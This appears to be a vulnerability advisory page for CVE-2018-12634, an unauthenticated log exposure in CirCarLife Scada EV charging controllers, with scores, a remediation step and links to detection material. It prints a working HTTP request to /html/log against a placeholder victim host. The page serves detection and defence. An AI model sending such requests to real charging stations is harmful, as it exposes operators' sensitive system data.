🔙 목록으로 돌아가기

CVE-2018-12634: CirCarLife Scada <4.3 - System Log Exposure

TitleCirCarLife Scada <4.3 - System Log Exposure
Authorgeeknik
SeverityCritical
ImpactAn attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability.
CVSS Score9.8
EPSS Score0.92847
CVE IDCVE-2018-12634
CWE IDCWE-200
Tags cve cve2018 scada circontrol circarlife logs edb vuln

🔍 Vulnerability Description

CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.

🌐 HTTP Request

GET /html/log HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/140.0.4 (x64 de)
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-12634.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-12634.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A